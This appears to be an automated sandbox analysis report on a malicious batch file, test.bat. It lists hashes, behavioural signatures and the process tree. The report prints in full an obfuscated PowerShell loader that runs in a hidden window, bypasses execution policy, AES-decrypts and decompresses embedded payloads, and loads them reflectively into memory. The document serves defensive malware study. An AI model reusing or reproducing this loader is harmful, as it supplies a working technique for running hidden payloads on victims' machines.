Analysis
-
max time kernel
100s -
max time network
103s -
platform
windows11-21h2_x64 -
resource
win11-20240412-en -
resource tags
arch:x64arch:x86image:win11-20240412-enlocale:en-usos:windows11-21h2-x64system -
submitted
21-04-2024 01:48
Static task
static1
Behavioral task
behavioral1
Sample
test.bat
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
test.bat
Resource
win10v2004-20240412-en
Behavioral task
behavioral3
Sample
test.bat
Resource
win11-20240412-en
General
-
Target
test.bat
-
Size
268KB
-
MD5
e6eec329c32f1bf1ba285c807bdaffb0
-
SHA1
20e3d8fef3adedd37668ca788639bc966027cff1
-
SHA256
930b3773e732802cf74422e6d9d3fcc1566ddfef2128da051c443a40af034c87
-
SHA512
87990393433bcd2fd75fc2edbe53611c52c93206a84b7f65d1f87ae1e17f80e5168482af89d3bca1048cff3983b31e3d9d7d3247fc07a1c929fccd6ee6e7dfd4
-
SSDEEP
3072:7GGNSWszdUZssGdbYxjxGZcYwTM14zCRIvlWPuUCEeTLiP+Xv1XQkwzpB0R0JNxH:64SWsVxbvcYAVamUMnxQkwzbM0bHRYle
Malware Config
Signatures
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4304 powershell.exe 4304 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4304 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3000 wrote to memory of 1288 3000 cmd.exe 80 PID 3000 wrote to memory of 1288 3000 cmd.exe 80 PID 1288 wrote to memory of 2340 1288 net.exe 81 PID 1288 wrote to memory of 2340 1288 net.exe 81 PID 3000 wrote to memory of 4304 3000 cmd.exe 83 PID 3000 wrote to memory of 4304 3000 cmd.exe 83
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:1288 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:2340
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9PqzSgGfzbfKcnvutnT5mKYiHeTYi9lIqU8dajeIrFM='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Fh4h+xeZ38fV8B4MJvG/IQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $fhjLQ=New-Object System.IO.MemoryStream(,$param_var); $RlKtN=New-Object System.IO.MemoryStream; $mgqdF=New-Object System.IO.Compression.GZipStream($fhjLQ, [IO.Compression.CompressionMode]::Decompress); $mgqdF.CopyTo($RlKtN); $mgqdF.Dispose(); $fhjLQ.Dispose(); $RlKtN.Dispose(); $RlKtN.ToArray();}function execute_function($param_var,$param2_var){ $MGPKv=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QWwXU=$MGPKv.EntryPoint; $QWwXU.Invoke($null, $param2_var);}$Dxsjd = '';$host.UI.RawUI.WindowTitle = $Dxsjd;$YlOla=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($Dxsjd).Split([Environment]::NewLine);foreach ($GSRxr in $YlOla) { if ($GSRxr.StartsWith(':: ')) { $YyOfU=$GSRxr.Substring(3); break; }}$payloads_var=[string[]]$YyOfU.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4304
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82